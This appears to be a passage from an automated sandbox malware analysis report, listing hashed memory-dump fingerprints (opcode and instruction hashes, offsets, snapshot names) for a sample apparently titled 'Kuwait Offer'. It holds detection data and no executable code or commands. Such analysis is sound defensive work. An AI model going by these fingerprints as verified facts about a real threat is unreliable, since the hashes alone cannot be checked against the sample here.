                                          • Opcode ID: cce3048c81129c0f30fdd012ff31819cd5971deacfc8732ef5881c91f451be74
                                          • Instruction ID: 5cf66f501352096645fe5eebd7c1f29d379e48b91e6d066c38023840547076db
                                          • Opcode Fuzzy Hash: cce3048c81129c0f30fdd012ff31819cd5971deacfc8732ef5881c91f451be74
                                          • Instruction Fuzzy Hash: EE1146B4910108DFD714DF58D898BEDBBBAFB4A309F000869DA0AB7684CB385884CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab94f491f67624674fe4835afbb858ff117847aa187fdc147833b0f11e7805a9
                                          • Instruction ID: 71e0b1003235e1ae7f0f81c23c759a11a17527cdc73f48f7dac6c6b821aee8ce
                                          • Opcode Fuzzy Hash: ab94f491f67624674fe4835afbb858ff117847aa187fdc147833b0f11e7805a9
                                          • Instruction Fuzzy Hash: 4F212974A01259CFCB54DF68D580BDDBBB4FB0A304F1144EAD849A7201C7319E85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 807c74f774ae1fb5fbb498bc34a48e2ead7418efff50632396e2797783fe3265
                                          • Instruction ID: c79e67d2d4b0f7eaa6ec5a079159037140a9dfab083ca956eaa38a5ee1195ef3
                                          • Opcode Fuzzy Hash: 807c74f774ae1fb5fbb498bc34a48e2ead7418efff50632396e2797783fe3265
                                          • Instruction Fuzzy Hash: DE11F3B0E0020ADFDB48EFE9D9457BEBBF5BF89300F20806AD419A7354DA345A018B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e8591cd3d1eef85f8ba4264db682cf5b1d52f56f98bc74c7991d173240c0171
                                          • Instruction ID: 96c06ac1cc37c8afa49c0c9089789ca8e5a85552af72392c1d0f08e2e8807b15
                                          • Opcode Fuzzy Hash: 9e8591cd3d1eef85f8ba4264db682cf5b1d52f56f98bc74c7991d173240c0171
                                          • Instruction Fuzzy Hash: 6D012D31B083516FE3158B259850B57FBE8DFCA310F1548ABD9859B351CA729C41C7D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1d7e7fe53884c3aaa5dcc0ae7419b97c79ad561115f21e9056a5816fafb56ca
                                          • Instruction ID: f13dba9956a1677aef882f246a04a1743d6102184f25ace797725876d79b3500
                                          • Opcode Fuzzy Hash: b1d7e7fe53884c3aaa5dcc0ae7419b97c79ad561115f21e9056a5816fafb56ca
                                          • Instruction Fuzzy Hash: D5116DB0D05209CFDBA8DF7984456AEBFF5AB49300F1585AAD408E3201E7304689CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04adfa85ab4603fab006120c201bb578b48706bd5e037facb72756c14ebddfd8
                                          • Instruction ID: 3c4e253e758ae64e7cf9f12d44b31f24a4de9cd18e9d0058be92b0421db58aa5
                                          • Opcode Fuzzy Hash: 04adfa85ab4603fab006120c201bb578b48706bd5e037facb72756c14ebddfd8
                                          • Instruction Fuzzy Hash: 81017C35300610DFC7159B65D418A9AB7A6EFCA711B10856AEB068B790CF31EC52CBC5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2d6caaa9d32cccee9a453d021455d5cbf6dc74b1965437c10e427cdd9dafbf1
                                          • Instruction ID: df2eb0fd4f32735b61fde442a9e124da654cb4a4c0a19c2bc43ba1979417ce3e
                                          • Opcode Fuzzy Hash: d2d6caaa9d32cccee9a453d021455d5cbf6dc74b1965437c10e427cdd9dafbf1
                                          • Instruction Fuzzy Hash: D401BC347006149FC3699B64D844A6B77A2EFC9320F14862CE6664B794CB76EC02DB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04edd60854a944ab9331b56eca6597742d52998d10761dad4f2b21fe65e50c66
                                          • Instruction ID: 02449f89940321d82ca06184aebc034c296d17409ba6bbfb921a982f64c46285
                                          • Opcode Fuzzy Hash: 04edd60854a944ab9331b56eca6597742d52998d10761dad4f2b21fe65e50c66
                                          • Instruction Fuzzy Hash: 5B014B7095A20CEFCB95DFB8D444AADBBF8AF0A301F1014EAC848D3250E7305B95DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5abb7d62cc5b64e615e84ff98485c53e83ec12e51b667bb678ff0fb7d6e33734
                                          • Instruction ID: ac1c7b307bf2b9152041e11bda49e5db6bb2f6ec7909d899249dc7873b573137
                                          • Opcode Fuzzy Hash: 5abb7d62cc5b64e615e84ff98485c53e83ec12e51b667bb678ff0fb7d6e33734
                                          • Instruction Fuzzy Hash: 5AF0C836B101156BC7149E19C854DAEF7B9EFC8360B04803AF919D7361DB719C16C7D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd0825ff1f764cbca684e197d1c748e3c2f4c3d712d517b722b0032f0e12fafd
                                          • Instruction ID: 1d6d4b9b4d759de350aeb03f673e8720f4c71bf97c13e46deeb312976f8c1c48
                                          • Opcode Fuzzy Hash: bd0825ff1f764cbca684e197d1c748e3c2f4c3d712d517b722b0032f0e12fafd
                                          • Instruction Fuzzy Hash: 11F0CD30966398DFDBA5CBB884047E93BF8AB06251F0542ABD808D3261D6348944D781
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c8daf65b735f2a1f49c7b66d9840ee3e7abe4c847bff4fd96bc4b0da94853b6
                                          • Instruction ID: 3542ca64f548f415bf530436bf7dfda4fa26c6767a2bcf1981ec28e0ff760bbe
                                          • Opcode Fuzzy Hash: 8c8daf65b735f2a1f49c7b66d9840ee3e7abe4c847bff4fd96bc4b0da94853b6
                                          • Instruction Fuzzy Hash: F1F068353052409FC7159B25D854E6B7BAAEFC9720B0544AAFA46CB371CA31EC42C790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6eb6270dc250c1970e628df2bb54d100e4d250ba2bda9ded04470ae4cf5c7da8
                                          • Instruction ID: 4dc4bec2f1ebba129ef2105dac0965c2568089e9d2e4da74c71b8b012f5a3c22
                                          • Opcode Fuzzy Hash: 6eb6270dc250c1970e628df2bb54d100e4d250ba2bda9ded04470ae4cf5c7da8
                                          • Instruction Fuzzy Hash: 2811E678904229CFDBA4DF14C948AE9B7B9EB49308F0095E8A51DA3A44CB745E85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d637b974a98efee3eb8377813eac635a1d8972ae406a74a7e6f779e9cb2c4f
                                          • Instruction ID: f4cef7192d7177f59a30464913f78dea0a74ae052740e08540058f22f77c15ed
                                          • Opcode Fuzzy Hash: b3d637b974a98efee3eb8377813eac635a1d8972ae406a74a7e6f779e9cb2c4f
                                          • Instruction Fuzzy Hash: 0B11E6789412198FDB64DF64D85479EB7B6FB49304F1080AAC60AB3784DB385E85DF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 200c1bef5464c2fa5e5b35301a3eb0e6dace717153a006f58dfbb4b41d857d32
                                          • Instruction ID: 83368333b0d4c6cbbc0f87c93a3b9b57d731dd888e7d300c33694ec7c95657dd
                                          • Opcode Fuzzy Hash: 200c1bef5464c2fa5e5b35301a3eb0e6dace717153a006f58dfbb4b41d857d32
                                          • Instruction Fuzzy Hash: 0D11B078A41229CFDBA4DF18C888AE9B7B5FB49308F0045E9D50DE3344DB349E958F01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf58b1291e14453841c6777064985f062b26d56f07eeefc7ae4694d7b60c7f73
                                          • Instruction ID: d54d2c037bcb748545865a2803527a40899bce17061976cdff0daa6292f28fef
                                          • Opcode Fuzzy Hash: cf58b1291e14453841c6777064985f062b26d56f07eeefc7ae4694d7b60c7f73
                                          • Instruction Fuzzy Hash: 79F0C974D05208AFCB94DFA8D5446ADBBF8AB89300F24C0AA9858D3341D6759A41DF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ef18d8b76a70680773c80b78af3fab0be2bf77da1f6fea86ae2057075a76cf2
                                          • Instruction ID: 47970a8b2d91ca865b5d8ab63b352e0c2f320813b383af0c24c9d1c2f80ead75
                                          • Opcode Fuzzy Hash: 9ef18d8b76a70680773c80b78af3fab0be2bf77da1f6fea86ae2057075a76cf2
                                          • Instruction Fuzzy Hash: 19F0D475C402AE8FDB28DF10CC48BEEBA7ABB54308F1045E99509B2650DBB14E858F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36dda0386b3a7da319f8d95434b975b7e822f39f12d5c0e721cc6d7b93757444
                                          • Instruction ID: e4077a4966ba47bd7347fba1f2f3b322a51c5d9ac68e6948ab281aabcbf34b54
                                          • Opcode Fuzzy Hash: 36dda0386b3a7da319f8d95434b975b7e822f39f12d5c0e721cc6d7b93757444
                                          • Instruction Fuzzy Hash: 94E08630B203249BDAD0AA649D00BA273C59B86751F10446DE6065B384DE71E80187D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c553bae51809cdb1bd7409ce5789bca409679390029763206f8dcfc2dceab7c
                                          • Instruction ID: 16b010b2e12884485b1e59ad881fb1e34c58a400ee73911f7a911973200f3128
                                          • Opcode Fuzzy Hash: 0c553bae51809cdb1bd7409ce5789bca409679390029763206f8dcfc2dceab7c
                                          • Instruction Fuzzy Hash: 53E02630B0C7528FDB238B29D8506877BE2AFC970430089AFE049C7205ED24DC158793
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction ID: e033141c97199a860605321f69e16afda6c8a6db659bc6109499a4baec4efd44
                                          • Opcode Fuzzy Hash: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction Fuzzy Hash: E5E0E574E0620CEFDB94DFA8D545AACFBF4EB89300F14C1AA9818A3350D631AA51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction ID: 6f58014ee106a44ae96e762a827af87e4769f552593f086ad71d9e7c311a65a0
                                          • Opcode Fuzzy Hash: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction Fuzzy Hash: 41E0C274E05208EFCB94DFA8D544AACBBF4EF8A300F10C0AA9919A3350D671AA51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction ID: c3ef0c0252222065208514ed8c2c4d8233298af009f73a993092e35b407b8483
                                          • Opcode Fuzzy Hash: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction Fuzzy Hash: 9CE0E574E05308EFCB94DFA8D544AACBBF8EB89304F14D0AD9C08A3341D631AA02CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb125b259659a2f617a3ab1360b4a765cda52e4992ffb0ad8dd81233c051ddeb
                                          • Instruction ID: 28f3e5d91933f808450eb182d2698d813e65c06261dbd84c583fb6ad7a51ec3c
                                          • Opcode Fuzzy Hash: cb125b259659a2f617a3ab1360b4a765cda52e4992ffb0ad8dd81233c051ddeb
                                          • Instruction Fuzzy Hash: 8CE0C278905208EFCB54DFA8D5489ACBBB8EF49301F10C1A9EC0597320C631AA54EB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c1399be2d1cc0ab2f023c60e7e5e7d4838b73b5eeae7bdbb4bffff0a0661530
                                          • Instruction ID: 40ebcacd4ec47215ee9cb27304b4f7a73b8462f34d05b2a9ef5a863d117d467b
                                          • Opcode Fuzzy Hash: 4c1399be2d1cc0ab2f023c60e7e5e7d4838b73b5eeae7bdbb4bffff0a0661530
                                          • Instruction Fuzzy Hash: 3FE01A70D0A20CEFCB54DFA8D404AADBBF9EB49305F14C1AAD804A3310D7359A50EF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction ID: 43396f3f433c6402121d23f11043401236175c7f845e026d1428674695a676a0
                                          • Opcode Fuzzy Hash: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction Fuzzy Hash: 71E0E574E05208EFCB94DFA8D544AACBBF8EF8A300F10C0A9881893350D631AA02CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18907062c3ea51e571277aff0f97360c14ac943746b8ac51cd5fd1fc268a3a86
                                          • Instruction ID: 4931b108e72584ff25cfa7bce989c0ac127efbb9ce7dd663ece84b8af153f434
                                          • Opcode Fuzzy Hash: 18907062c3ea51e571277aff0f97360c14ac943746b8ac51cd5fd1fc268a3a86
                                          • Instruction Fuzzy Hash: 85E01A70D0620CEFCB54DFA8D0046ACB7B9EB46300F1081AAC80893300D6355A40EF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e64d3df31226f81c83c341ca94085fe983a5cabe7da1e2736b09a6ac963acf3
                                          • Instruction ID: 98730b15776b315d39bbe0cb2f4c060121f10becc101edd09b3ca7432c67d0e0
                                          • Opcode Fuzzy Hash: 6e64d3df31226f81c83c341ca94085fe983a5cabe7da1e2736b09a6ac963acf3
                                          • Instruction Fuzzy Hash: BFE0867490920CEFC744DFA4D544AFDBBB8AB46311F14D19DD84557341C6319A41DB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a728be099373e45a8180aa32c87f5d0b252e4dca1046045f8ac862430476b2c8
                                          • Instruction ID: 2bb704a9cb9b341e7bd25fa9fe607aa63645ba70fc13a4d40a41f8a2db83aa82
                                          • Opcode Fuzzy Hash: a728be099373e45a8180aa32c87f5d0b252e4dca1046045f8ac862430476b2c8
                                          • Instruction Fuzzy Hash: 96E04F30915208DFC784EFA8C58566CFBF8EB49200F1080A98C09D3340D6719A41CB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10619ca33fa465a651c608c8a508f1eea8b89a49171b2cf1ccfbed674b804c22
                                          • Instruction ID: c2658e5db8bb9c52960fb128b1e59bfe98f4d97c297df0b0ffdde4fa5bf2013d
                                          • Opcode Fuzzy Hash: 10619ca33fa465a651c608c8a508f1eea8b89a49171b2cf1ccfbed674b804c22
                                          • Instruction Fuzzy Hash: B1F0F878902118CFE750DF14D844F89B7B2FB45308F1086AAD90EA7784DA384D898F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73c47c759769e69b9910fc881e0c340f57f9b516f969becdab88659a8abd64df
                                          • Instruction ID: 7cd6c49011a528fc52ecc2c701e42569be704e7b9affa2fc37c89edd6db0cd45
                                          • Opcode Fuzzy Hash: 73c47c759769e69b9910fc881e0c340f57f9b516f969becdab88659a8abd64df
                                          • Instruction Fuzzy Hash: DFE01A34D0920CAFCB58DBA4D5406ACBBB8AB8A300F14C1EDA85853341D6315A01DB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b3408ae1df85c6ddf833f41cc5db39f9526767cbee44925fdf3ddd48b8be657
                                          • Instruction ID: 33961f203c905ae96376fda7bef90214a912d4adb6601517f9a9e07c0c9bcdc5
                                          • Opcode Fuzzy Hash: 2b3408ae1df85c6ddf833f41cc5db39f9526767cbee44925fdf3ddd48b8be657
                                          • Instruction Fuzzy Hash: 89E0C270C2624CDFCB80DFB8D4086ACBBF8EB0A301F1041AA8D08E3300EB301A40DB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d83663ed98de2585f1aeac9fb2d63fad48aec30f2916819e97291d89788c3d3
                                          • Instruction ID: 0f000e5e216c663845335dcc2f86beb39c18c7515afdd325d7843b520de2fa4a
                                          • Opcode Fuzzy Hash: 0d83663ed98de2585f1aeac9fb2d63fad48aec30f2916819e97291d89788c3d3
                                          • Instruction Fuzzy Hash: 52F09B7480062ECFCF759F10CC44AE9BBB6AB88305F0040E69409B2A60DB711EC6EF00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd2538c9c27980752e3a7e9bf7e5fdd766a7f68d211079ea958e035478e17e93
                                          • Instruction ID: 0880b0ec739b94b907bddc1f71b9be90143c2ccb9882d4f7ac261fd544dba99d
                                          • Opcode Fuzzy Hash: cd2538c9c27980752e3a7e9bf7e5fdd766a7f68d211079ea958e035478e17e93
                                          • Instruction Fuzzy Hash: 29F0AE748002AECFDB24DF10CC04BEEBBBABB48304F1085EA9509B2690DBB10E81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bbb3af10d4f5b35dfc4f61ba7d470e75d49c2bce3bc5e0c462e421b6e864d96
                                          • Instruction ID: ad3b76fc0e5a07ba5728a1962444f997db783e05891e473fcd06c2b3ed574b4b
                                          • Opcode Fuzzy Hash: 9bbb3af10d4f5b35dfc4f61ba7d470e75d49c2bce3bc5e0c462e421b6e864d96
                                          • Instruction Fuzzy Hash: CDE08C3894A208DFDB05DFA8E5416ACBBB8AB86301F20D09CC80813340CA316E02CB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 862439252904c18a0840b7cf2c8cf6b420c015624ff1c2ea283ab7264ed82e98
                                          • Instruction ID: 138bedd38e1bc4494f8f38d6e2db4362646ea89b351405e180f5e72cd0a51d46
                                          • Opcode Fuzzy Hash: 862439252904c18a0840b7cf2c8cf6b420c015624ff1c2ea283ab7264ed82e98
                                          • Instruction Fuzzy Hash: 06E0127195220CEFCB51EFF489047AEB7AC9B47204F4445A9840597110EE715A10E792
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb382b05d3a8736b1e3e7280358860594e2171bab112efd9c45b23c9daceac96
                                          • Instruction ID: 3e53b2a89de994f72342078e50ed329222b037152d96234db5d2cef804d2557b
                                          • Opcode Fuzzy Hash: fb382b05d3a8736b1e3e7280358860594e2171bab112efd9c45b23c9daceac96
                                          • Instruction Fuzzy Hash: 0CF0FDB4D4022A8FDB65CF14E944BA9BBB9BB48341F1051E9D659B3254DB345E818F04
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aff6a7147d6bece43caf86e5253578e7223fb0a8a5c667622b8510ffdbf03036
                                          • Instruction ID: 258fd68078b5a9e72727c350b7e52dd73bf0f93449f0329535a88c1b0f5a37ff
                                          • Opcode Fuzzy Hash: aff6a7147d6bece43caf86e5253578e7223fb0a8a5c667622b8510ffdbf03036
                                          • Instruction Fuzzy Hash: DDE01270E00209EFDB00DFB5D95567EB7BAEB45304F10C6A9EA09D7244D9715F0097C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
